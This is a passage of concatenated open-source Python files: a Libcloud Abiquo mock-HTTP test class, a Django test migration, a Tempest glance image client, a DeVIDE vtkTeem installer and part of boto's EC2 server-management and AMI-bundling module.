if headers['Authorization'] == 'Basic c29uOmdvdGVu':
expected_response = self.fixtures.load('unauthorized_user.html')
expected_status = httplib.UNAUTHORIZED
else:
expected_response = self.fixtures.load('login.xml')
expected_status = httplib.OK
return (expected_status, expected_response, {}, '')
def _api_cloud_virtualdatacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdcs.xml'), {}, '')
def _api_cloud_virtualdatacenters_4(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdc_4.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances(self, method, url, body, headers):
if method == 'POST':
vapp_name = ET.XML(body).findtext('name')
if vapp_name == 'libcloud_test_group':
# we come from 'test_ex_create_and_delete_empty_group(self):'
# method and so, we return the 'ok' return
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
elif vapp_name == 'new_group_name':
# we come from 'test_ex_create_and_delete_empty_group(self):'
# method and so, we return the 'ok' return
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
else:
# It will be a 'GET';
return (httplib.OK, self.fixtures.load('vdc_4_vapps.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5(self, method, url, body, headers):
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to destroy a group with 'needs_sync' state
response = self.fixtures.load('vdc_4_vapp_5_needs_sync.xml')
else:
# Try to destroy a group with 'undeployed' state
response = self.fixtures.load('vdc_4_vapp_5.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6(self, method, url, body, headers):
if method == 'GET':
# deployed vapp
response = self.fixtures.load('vdc_4_vapp_6.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_1da8c8b6_86f6_49ef_9d29_57dcc73b875a(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_undeploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5_virtualmachines(
self, method, url, body, headers):
# This virtual app never have virtual machines
if method == 'GET':
response = self.fixtures.load('vdc_4_vapp_5_vms.xml')
return (httplib.OK, response, {}, '')
elif method == 'POST':
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines(
self, method, url, body, headers):
# Default-created virtual app virtual machines'
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
response = self.fixtures.load('vdc_4_vapp_6_vms_allocated.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vms.xml')
return (httplib.OK, response, {}, '')
else:
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3(self, method, url, body, headers):
if (headers['Authorization'] == 'Basic Z286dHJ1bmtz' or
headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk='):
# Undeploy node
response = self.fixtures.load("vdc_4_vapp_6_vm_3_deployed.xml")
elif headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to undeploy a node with 'allocation' state
response = self.fixtures.load('vdc_4_vapp_6_vm_3_allocated.xml')
else:
# Get node
response = self.fixtures.load('vdc_4_vapp_6_vm_3.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_deploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_b44fe278_6b0f_4dfb_be81_7c03006a93cb(self, method, url, body, headers):
if headers['Authorization'] == 'Basic dGVuOnNoaW4=':
# User 'ten:shin' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_vm_3_deploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_action_undeploy(
self, method, url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_undeploy.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_reset(self, method,
url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_a8c9818e_f389_45b7_be2c_3db3a9689940(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_undeploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_undeploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_network_nics(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_nics.xml')
return (httplib.OK, response, {}, '')
def _api_admin_datacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('dcs.xml'), {}, '')
def _api_admin_enterprises_1(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories(self, method, url, body, headers):
# When the user is the common one for all the tests ('son, 'goku')
# it creates this basic auth and we return the datacenters value
if headers['Authorization'] == 'Basic Z286dHJ1bmtz':
expected_response = self.fixtures.load("not_found_error.xml")
return (httplib.NOT_FOUND, expected_response, {}, '')
elif headers['Authorization'] != 'Basic c29uOmdvaGFu':
return (httplib.OK, self.fixtures.load('ent_1_dcreps.xml'), {}, '')
else:
# son:gohan user: forbidden error
expected_response = self.fixtures.load("privilege_errors.html")
return (httplib.FORBIDDEN, expected_response, {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2_templates.xml'),
{}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates_11(self, method, url, body, headers):
return (
httplib.OK, self.fixtures.load('ent_1_dcrep_2_template_11.xml'),
{}, '')
if __name__ == '__main__':
sys.exit(unittest.main())
|
skirsdeda/django | refs/heads/master | tests/migrations/test_migrations_squashed_complex_multi_apps/app1/3_auto.py | 22 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("app1", "2_auto"), ("app2", "2_auto")]
operations = [
migrations.RunPython(lambda apps, schema_editor: None)
]
|
afaheem88/tempest | refs/heads/master | tempest/services/image/v1/json/image_client.py | 6 | # Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import errno
import json
import os
import time
from oslo_log import log as logging
import six
from six.moves.urllib import parse as urllib
from tempest_lib.common.utils import misc as misc_utils
from tempest_lib import exceptions as lib_exc
from tempest.common import glance_http
from tempest.common import service_client
from tempest import exceptions
LOG = logging.getLogger(__name__)
class ImageClient(service_client.ServiceClient):
def __init__(self, auth_provider, catalog_type, region, endpoint_type=None,
build_interval=None, build_timeout=None,
disable_ssl_certificate_validation=None,
ca_certs=None, trace_requests=None):
super(ImageClient, self).__init__(
auth_provider,
catalog_type,
region,
endpoint_type=endpoint_type,
build_interval=build_interval,
build_timeout=build_timeout,
disable_ssl_certificate_validation=(
disable_ssl_certificate_validation),
ca_certs=ca_certs,
trace_requests=trace_requests)
self._http = None
self.dscv = disable_ssl_certificate_validation
self.ca_certs = ca_certs
def _image_meta_from_headers(self, headers):
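        # Convert 'x-image-meta-*' and 'x-image-meta-property-*' response
        # headers back into an image metadata dict, coercing the boolean and
        # integer fields to their native types.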
meta = {'properties': {}}
for key, value in six.iteritems(headers):
if key.startswith('x-image-meta-property-'):
_key = key[22:]
meta['properties'][_key] = value
elif key.startswith('x-image-meta-'):
_key = key[13:]
meta[_key] = value
for key in ['is_public', 'protected', 'deleted']:
if key in meta:
meta[key] = meta[key].strip().lower() in ('t', 'true', 'yes',
'1')
for key in ['size', 'min_ram', 'min_disk']:
if key in meta:
try:
meta[key] = int(meta[key])
except ValueError:
pass
return meta
def _image_meta_to_headers(self, fields):
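        # Inverse of _image_meta_from_headers: flatten an image metadata dict
        # into the 'x-image-meta-*' / 'x-glance-api-*' request headers that
        # the glance v1 API expects.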
headers = {}
fields_copy = copy.deepcopy(fields)
copy_from = fields_copy.pop('copy_from', None)
if copy_from is not None:
headers['x-glance-api-copy-from'] = copy_from
for key, value in six.iteritems(fields_copy.pop('properties', {})):
headers['x-image-meta-property-%s' % key] = str(value)
for key, value in six.iteritems(fields_copy.pop('api', {})):
headers['x-glance-api-property-%s' % key] = str(value)
for key, value in six.iteritems(fields_copy):
headers['x-image-meta-%s' % key] = str(value)
return headers
def _get_file_size(self, obj):
"""Analyze file-like object and attempt to determine its size.
:param obj: file-like object, typically redirected from stdin.
:retval The file's size or None if it cannot be determined.
"""
# For large images, we need to supply the size of the
# image file. See LP Bugs #827660 and #845788.
if hasattr(obj, 'seek') and hasattr(obj, 'tell'):
try:
obj.seek(0, os.SEEK_END)
obj_size = obj.tell()
obj.seek(0)
return obj_size
except IOError as e:
if e.errno == errno.ESPIPE:
# Illegal seek. This means the user is trying
# to pipe image data to the client, e.g.
# echo testdata | bin/glance add blah..., or
# that stdin is empty, or that a file-like
# object which doesn't support 'seek/tell' has
# been supplied.
return None
else:
raise
else:
# Cannot determine size of input image
return None
def _get_http(self):
return glance_http.HTTPClient(auth_provider=self.auth_provider,
filters=self.filters,
insecure=self.dscv,
ca_certs=self.ca_certs)
def _create_with_data(self, headers, data):
resp, body_iter = self.http.raw_request('POST', '/v1/images',
headers=headers, body=data)
self._error_checker('POST', '/v1/images', headers, data, resp,
body_iter)
body = json.loads(''.join([c for c in body_iter]))
return service_client.ResponseBody(resp, body['image'])
def _update_with_data(self, image_id, headers, data):
url = '/v1/images/%s' % image_id
resp, body_iter = self.http.raw_request('PUT', url, headers=headers,
body=data)
self._error_checker('PUT', url, headers, data,
resp, body_iter)
body = json.loads(''.join([c for c in body_iter]))
return service_client.ResponseBody(resp, body['image'])
@property
def http(self):
if self._http is None:
self._http = self._get_http()
return self._http
def create_image(self, name, container_format, disk_format, **kwargs):
params = {
"name": name,
"container_format": container_format,
"disk_format": disk_format,
}
headers = {}
for option in ['is_public', 'location', 'properties',
'copy_from', 'min_ram']:
if option in kwargs:
params[option] = kwargs.get(option)
headers.update(self._image_meta_to_headers(params))
if 'data' in kwargs:
return self._create_with_data(headers, kwargs.get('data'))
resp, body = self.post('v1/images', None, headers)
self.expected_success(201, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['image'])
def update_image(self, image_id, name=None, container_format=None,
data=None, properties=None):
params = {}
headers = {}
if name is not None:
params['name'] = name
if container_format is not None:
params['container_format'] = container_format
if properties is not None:
params['properties'] = properties
headers.update(self._image_meta_to_headers(params))
if data is not None:
return self._update_with_data(image_id, headers, data)
url = 'v1/images/%s' % image_id
resp, body = self.put(url, data, headers)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['image'])
def delete_image(self, image_id):
url = 'v1/images/%s' % image_id
resp, body = self.delete(url)
self.expected_success(200, resp.status)
return service_client.ResponseBody(resp, body)
def list_images(self, detail=False, properties=dict(),
changes_since=None, **kwargs):
url = 'v1/images'
if detail:
url += '/detail'
params = {}
for key, value in properties.items():
params['property-%s' % key] = value
kwargs.update(params)
if changes_since is not None:
kwargs['changes-since'] = changes_since
if len(kwargs) > 0:
url += '?%s' % urllib.urlencode(kwargs)
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBodyList(resp, body['images'])
def get_image_meta(self, image_id):
url = 'v1/images/%s' % image_id
resp, __ = self.head(url)
self.expected_success(200, resp.status)
body = self._image_meta_from_headers(resp)
return service_client.ResponseBody(resp, body)
def show_image(self, image_id):
url = 'v1/images/%s' % image_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
return service_client.ResponseBodyData(resp, body)
def is_resource_deleted(self, id):
try:
self.get_image_meta(id)
except lib_exc.NotFound:
return True
return False
@property
def resource_type(self):
"""Returns the primary type of resource this client works with."""
return 'image_meta'
def list_image_members(self, image_id):
url = 'v1/images/%s/members' % image_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body)
def list_shared_images(self, tenant_id):
"""List shared images with the specified tenant"""
url = 'v1/shared-images/%s' % tenant_id
resp, body = self.get(url)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body)
def add_member(self, member_id, image_id, can_share=False):
url = 'v1/images/%s/members/%s' % (image_id, member_id)
body = None
if can_share:
body = json.dumps({'member': {'can_share': True}})
resp, __ = self.put(url, body)
self.expected_success(204, resp.status)
return service_client.ResponseBody(resp)
def delete_member(self, member_id, image_id):
url = 'v1/images/%s/members/%s' % (image_id, member_id)
resp, __ = self.delete(url)
self.expected_success(204, resp.status)
return service_client.ResponseBody(resp)
# NOTE(afazekas): just for the wait function
def _get_image_status(self, image_id):
meta = self.get_image_meta(image_id)
status = meta['status']
return status
    # NOTE(afazekas): Wait reinvented again. It is not in the correct layer
def wait_for_image_status(self, image_id, status):
"""Waits for a Image to reach a given status."""
start_time = time.time()
old_value = value = self._get_image_status(image_id)
while True:
dtime = time.time() - start_time
time.sleep(self.build_interval)
if value != old_value:
                LOG.info('Value transition from "%s" to "%s" '
'in %d second(s).', old_value,
value, dtime)
if value == status:
return value
if value == 'killed':
raise exceptions.ImageKilledException(image_id=image_id,
status=status)
if dtime > self.build_timeout:
                message = ('Time Limit Exceeded! (%ds) '
'while waiting for %s, '
'but we got %s.' %
(self.build_timeout, status, value))
caller = misc_utils.find_test_caller()
if caller:
message = '(%s) %s' % (caller, message)
raise exceptions.TimeoutException(message)
time.sleep(self.build_interval)
old_value = value
value = self._get_image_status(image_id)
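    # Illustrative usage sketch (hypothetical names, not part of the original
    # module): a caller holding an already-constructed ImageClient instance
    # could combine the methods above roughly as follows:
    #
    #   body = client.create_image('test-img', 'bare', 'raw',
    #                              is_public=False, data=image_file)
    #   image_id = body['id']
    #   client.wait_for_image_status(image_id, 'active')
    #   client.delete_image(image_id)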
|
fvpolpeta/devide.johannes | refs/heads/master | install_packages/ip_vtkteem.py | 5 | # Copyright (c) Francois Malan & Christian Kehl, TU Delft.
# All rights reserved.
# See COPYRIGHT for details.
import config
from install_package import InstallPackage
import os
import shutil
import utils
import sys
from subprocess import call
REVISION_NUMBER = "8877"
BASENAME = "vtkTeem"
SVN_REPO = "http://svn.slicer.org/Slicer3/trunk/Libs/vtkTeem"
dependencies = ['CMake', 'VTK58', 'Teem']
# this patch makes the necessary changes that enables building vtkTeem.
# These changes are explained in: http://code.google.com/p/devide/wiki/AddingVTKTeem
# This mainly involves replacing the default TCL wrappings with Python wrappings
TCL_PY_PATCH = "vtkteem_cmakelists_python_instead_of_tcl.diff"
class vtkTeem(InstallPackage):
def __init__(self):
self.source_dir = os.path.join(config.archive_dir, '%s' %
(BASENAME,))
self.build_dir = os.path.join(config.build_dir, '%s' %
(BASENAME,))
self.inst_dir = os.path.join(config.inst_dir, BASENAME)
self.tcl_py_patch_src = os.path.join(config.patches_dir, TCL_PY_PATCH)
self.tcl_py_patch_dst = os.path.join(self.source_dir, TCL_PY_PATCH)
def get(self):
if os.path.exists(self.source_dir):
utils.output("%s already checked out, skipping step." % BASENAME)
else:
os.chdir(config.archive_dir)
ret = call("%s co %s -r %s %s" % \
(config.SVN, SVN_REPO, REVISION_NUMBER, BASENAME), shell=True)
if ret != 0:
utils.error("Could not SVN checkout. Fix and try again.")
return
if not os.path.exists(self.tcl_py_patch_dst):
utils.output("Applying TCL -> Python patch")
# we do this copy so we can see if the patch has been done yet or not
shutil.copyfile(self.tcl_py_patch_src, self.tcl_py_patch_dst)
os.chdir(self.source_dir)
ret = os.system(
"%s < %s" % (config.PATCH, TCL_PY_PATCH))
if ret != 0:
utils.error(
"Could not apply TCL -> Python patch. Fix and try again.")
def unpack(self):
# no unpack step
pass
def configure(self):
if os.path.exists(
os.path.join(self.build_dir, 'CMakeFiles/cmake.check_cache')):
utils.output("vtkTeem build already configured.")
return
if not os.path.exists(self.build_dir):
os.mkdir(self.build_dir)
cmake_params = "-DCMAKE_BUILD_TYPE=RelWithDebInfo " \
"-DCMAKE_INSTALL_PREFIX=%s " \
"-DVTK_DIR=%s " \
"-DTeem_DIR=%s " \
% \
(self.inst_dir,config.VTK_DIR,config.Teem_DIR)
ret = utils.cmake_command(self.build_dir, self.source_dir,
cmake_params)
if ret != 0:
utils.error(
"Could not configure vtkTeem. Fix and try again.")
def build(self):
nt_file = os.path.join(self.build_dir,
'vtkTeemInit.cxx')
if utils.file_exists(nt_file, nt_file):
utils.output("vtkTeem already built. Skipping build step.")
else:
os.chdir(self.build_dir)
ret = utils.make_command('vtkTeem.sln')
if ret != 0:
utils.error("Could not build vtkTeem. Fix and try againn.")
def install(self):
if os.path.exists(
os.path.join(self.inst_dir, 'bin',
'vtkTeem' + config.PYE_EXT)):
utils.output("vtkTeem already installed. Skipping step.")
else:
os.chdir(self.build_dir)
ret = utils.make_command('vtkTeem.sln', install=True)
if ret != 0:
utils.error(
"Could not install vtkTeem. Fix and try again.")
else:
#There is a problem that the .dll is actually a .pyd but not recognized as such by DeVIDE. Rename.
if sys.platform == 'win32':
old_name = os.path.join(self.inst_dir, 'bin',
'vtkTeem' + config.SO_EXT)
new_name = os.path.join(self.inst_dir, 'bin',
'vtkTeem' + config.PYE_EXT)
if os.path.isfile(old_name) and (old_name != new_name):
utils.output("Renaming %s%s library to %s%s" % (BASENAME, config.SO_EXT, BASENAME, config.PYE_EXT))
os.rename(old_name, new_name)
def clean_build(self):
# nuke the build dir and install dir. The source dir is pristine
utils.output("Removing build dir.")
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
utils.output("Removing install dir.")
if os.path.exists(self.inst_dir):
shutil.rmtree(self.inst_dir)
def get_installed_version(self):
return "revision %s" % REVISION_NUMBER
|
yoer/hue | refs/heads/master | desktop/core/ext-py/boto-2.38.0/boto/manage/server.py | 153 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010 Chris Moyer http://coredumped.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
High-level abstraction of an EC2 server
"""
import boto.ec2
from boto.mashups.iobject import IObject
from boto.pyami.config import BotoConfigPath, Config
from boto.sdb.db.model import Model
from boto.sdb.db.property import StringProperty, IntegerProperty, BooleanProperty, CalculatedProperty
from boto.manage import propget
from boto.ec2.zone import Zone
from boto.ec2.keypair import KeyPair
import os, time
from contextlib import closing
from boto.exception import EC2ResponseError
from boto.compat import six, StringIO
InstanceTypes = ['m1.small', 'm1.large', 'm1.xlarge',
'c1.medium', 'c1.xlarge',
'm2.2xlarge', 'm2.4xlarge']
class Bundler(object):
def __init__(self, server, uname='root'):
from boto.manage.cmdshell import SSHClient
self.server = server
self.uname = uname
self.ssh_client = SSHClient(server, uname=uname)
def copy_x509(self, key_file, cert_file):
print('\tcopying cert and pk over to /mnt directory on server')
self.ssh_client.open_sftp()
path, name = os.path.split(key_file)
self.remote_key_file = '/mnt/%s' % name
self.ssh_client.put_file(key_file, self.remote_key_file)
path, name = os.path.split(cert_file)
self.remote_cert_file = '/mnt/%s' % name
self.ssh_client.put_file(cert_file, self.remote_cert_file)
print('...complete!')
def bundle_image(self, prefix, size, ssh_key):
command = ""
if self.uname != 'root':
command = "sudo "
command += 'ec2-bundle-vol '
command += '-c %s -k %s ' % (self.remote_cert_file, self.remote_key_file)
command += '-u %s ' % self.server._reservation.owner_id
command += '-p %s ' % prefix
command += '-s %d ' % size
command += '-d /mnt '
if self.server.instance_type == 'm1.small' or self.server.instance_type == 'c1.medium':
command += '-r i386'
else:
command += '-r x86_64'
return command
def upload_bundle(self, bucket, prefix, ssh_key):
command = ""
if self.uname != 'root':
command = "sudo "
command += 'ec2-upload-bundle '
command += '-m /mnt/%s.manifest.xml ' % prefix
command += '-b %s ' % bucket
command += '-a %s ' % self.server.ec2.aws_access_key_id
command += '-s %s ' % self.server.ec2.aws_secret_access_key
return command
def bundle(self, bucket=None, prefix=None, key_file=None, cert_file=None,
size=None, ssh_key=None, fp=None, clear_history=True):
iobject = IObject()
if not bucket:
bucket = iobject.get_string('Name of S3 bucket')
if not prefix:
prefix = iobject.get_string('Prefix for AMI file')
if not key_file:
key_file = iobject.get_filename('Path to RSA private key file')
if not cert_file:
cert_file = iobject.get_filename('Path to RSA public cert file')
if not size:
size = iobject.get_int('Size (in MB) of bundled image')
if not ssh_key:
ssh_key = self.server.get_ssh_key_file()
self.copy_x509(key_file, cert_file)
if not fp:
fp = StringIO()
fp.write('sudo mv %s /mnt/boto.cfg; ' % BotoConfigPath)
fp.write('mv ~/.ssh/authorized_keys /mnt/authorized_keys; ')
if clear_history:
fp.write('history -c; ')
fp.write(self.bundle_image(prefix, size, ssh_key))
fp.write('; ')
fp.write(self.upload_bundle(bucket, prefix, ssh_key))
fp.write('; ')
fp.write('sudo mv /mnt/boto.cfg %s; ' % BotoConfigPath)
fp.write('mv /mnt/authorized_keys ~/.ssh/authorized_keys')
command = fp.getvalue()
print('running the following command on the remote server:')
print(command)
t = self.ssh_client.run(command)
print('\t%s' % t[0])
print('\t%s' % t[1])
print('...complete!')
print('registering image...')
self.image_id = self.server.ec2.register_image(name=prefix, image_location='%s/%s.manifest.xml' % (bucket, prefix))
return self.image_id
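    # Illustrative usage sketch (assumed bucket, prefix and key paths; not part
    # of the original class):
    #
    #   bundler = server.get_bundler()
    #   ami_id = bundler.bundle(bucket='my-bundle-bucket', prefix='my-ami',
    #                           key_file='/path/to/pk.pem',
    #                           cert_file='/path/to/cert.pem', size=10240)
    #
    # Any argument left as None is prompted for interactively via IObject.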
class CommandLineGetter(object):
def get_ami_list(self):
my_amis = []
for ami in self.ec2.get_all_images():
# hack alert, need a better way to do this!
if ami.location.find('pyami') >= 0:
my_amis.append((ami.location, ami))
return my_amis
def get_region(self, params):
region = params.get('region', None)
if isinstance(region, basestring):
region = boto.ec2.get_region(region)
params['region'] = region
if not region:
prop = self.cls.find_property('region_name')
params['region'] = propget.get(prop, choices=boto.ec2.regions)
self.ec2 = params['region'].connect()
def get_name(self, params):
if not params.get('name', None):
prop = self.cls.find_property('name')
params['name'] = propget.get(prop)
def get_description(self, params):
if not params.get('description', None):
prop = self.cls.find_property('description')
params['description'] = propget.get(prop)
def get_instance_type(self, params):
if not params.get('instance_type', None):
prop = StringProperty(name='instance_type', verbose_name='Instance Type',
choices=InstanceTypes)
params['instance_type'] = propget.get(prop)
def get_quantity(self, params):
if not params.get('quantity', None):
prop = IntegerProperty(name='quantity', verbose_name='Number of Instances')
params['quantity'] = propget.get(prop)
def get_zone(self, params):
if not params.get('zone', None):
prop = StringProperty(name='zone', verbose_name='EC2 Availability Zone',
choices=self.ec2.get_all_zones)
params['zone'] = propget.get(prop)
def get_ami_id(self, params):
valid = False
while not valid:
ami = params.get('ami', None)
if not ami:
prop = StringProperty(name='ami', verbose_name='AMI')
ami = propget.get(prop)
try:
rs = self.ec2.get_all_images([ami])
if len(rs) == 1:
valid = True
params['ami'] = rs[0]
except EC2ResponseError:
pass
def get_group(self, params):
group = params.get('group', None)
if isinstance(group, basestring):
group_list = self.ec2.get_all_security_groups()
for g in group_list:
if g.name == group:
group = g
params['group'] = g
if not group:
prop = StringProperty(name='group', verbose_name='EC2 Security Group',
choices=self.ec2.get_all_security_groups)
params['group'] = propget.get(prop)
def get_key(self, params):
keypair = params.get('keypair', None)
if isinstance(keypair, basestring):
key_list = self.ec2.get_all_key_pairs()
for k in key_list:
if k.name == keypair:
keypair = k.name
params['keypair'] = k.name
if not keypair:
prop = StringProperty(name='keypair', verbose_name='EC2 KeyPair',
choices=self.ec2.get_all_key_pairs)
params['keypair'] = propget.get(prop).name
def get(self, cls, params):
self.cls = cls
self.get_region(params)
self.ec2 = params['region'].connect()
self.get_name(params)
self.get_description(params)
self.get_instance_type(params)
self.get_zone(params)
self.get_quantity(params)
self.get_ami_id(params)
self.get_group(params)
self.get_key(params)
class Server(Model):
#
# The properties of this object consists of real properties for data that
# is not already stored in EC2 somewhere (e.g. name, description) plus
# calculated properties for all of the properties that are already in
# EC2 (e.g. hostname, security groups, etc.)
#
name = StringProperty(unique=True, verbose_name="Name")
description = StringProperty(verbose_name="Description")
region_name = StringProperty(verbose_name="EC2 Region Name")
instance_id = StringProperty(verbose_name="EC2 Instance ID")
elastic_ip = StringProperty(verbose_name="EC2 Elastic IP Address")
production = BooleanProperty(verbose_name="Is This Server Production", default=False)
ami_id = CalculatedProperty(verbose_name="AMI ID", calculated_type=str, use_method=True)
zone = CalculatedProperty(verbose_name="Availability Zone Name", calculated_type=str, use_method=True)
hostname = CalculatedProperty(verbose_name="Public DNS Name", calculated_type=str, use_method=True)
private_hostname = CalculatedProperty(verbose_name="Private DNS Name", calculated_type=str, use_method=True)
groups = CalculatedProperty(verbose_name="Security Groups", calculated_type=list, use_method=True)
security_group = CalculatedProperty(verbose_name="Primary Security Group Name", calculated_type=str, use_method=True)
key_name = CalculatedProperty(verbose_name="Key Name", calculated_type=str, use_method=True)
instance_type = CalculatedProperty(verbose_name="Instance Type", calculated_type=str, use_method=True)
status = CalculatedProperty(verbose_name="Current Status", calculated_type=str, use_method=True)
launch_time = CalculatedProperty(verbose_name="Server Launch Time", calculated_type=str, use_method=True)
console_output = CalculatedProperty(verbose_name="Console Output", calculated_type=open, use_method=True)
packages = []
plugins = []
@classmethod
def add_credentials(cls, cfg, aws_access_key_id, aws_secret_access_key):
if not cfg.has_section('Credentials'):
cfg.add_section('Credentials')
cfg.set('Credentials', 'aws_access_key_id', aws_access_key_id)
cfg.set('Credentials', 'aws_secret_access_key', aws_secret_access_key)
if not cfg.has_section('DB_Server'):
cfg.add_section('DB_Server')
cfg.set('DB_Server', 'db_type', 'SimpleDB')
cfg.set('DB_Server', 'db_name', cls._manager.domain.name)
@classmethod
def create(cls, config_file=None, logical_volume = None, cfg = None, **params):
"""
Create a new instance based on the specified configuration file or the specified
configuration and the passed in parameters.
If the config_file argument is not None, the configuration is read from there.
Otherwise, the cfg argument is used.
The config file may include other config files with a #import reference. The included
config files must reside in the same directory as the specified file.
The logical_volume argument, if supplied, will be used to get the current physical
volume ID and use that as an override of the value specified in the config file. This
may be useful for debugging purposes when you want to debug with a production config
file but a test Volume.
The dictionary argument may be used to override any EC2 configuration values in the
config file.
"""
if config_file:
cfg = Config(path=config_file)
if cfg.has_section('EC2'):
# include any EC2 configuration values that aren't specified in params:
for option in cfg.options('EC2'):
if option not in params:
params[option] = cfg.get('EC2', option)
getter = CommandLineGetter()
getter.get(cls, params)
region = params.get('region')
ec2 = region.connect()
cls.add_credentials(cfg, ec2.aws_access_key_id, ec2.aws_secret_access_key)
ami = params.get('ami')
kp = params.get('keypair')
group = params.get('group')
zone = params.get('zone')
# deal with possibly passed in logical volume:
        if logical_volume is not None:
cfg.set('EBS', 'logical_volume_name', logical_volume.name)
cfg_fp = StringIO()
cfg.write(cfg_fp)
# deal with the possibility that zone and/or keypair are strings read from the config file:
if isinstance(zone, Zone):
zone = zone.name
if isinstance(kp, KeyPair):
kp = kp.name
reservation = ami.run(min_count=1,
max_count=params.get('quantity', 1),
key_name=kp,
security_groups=[group],
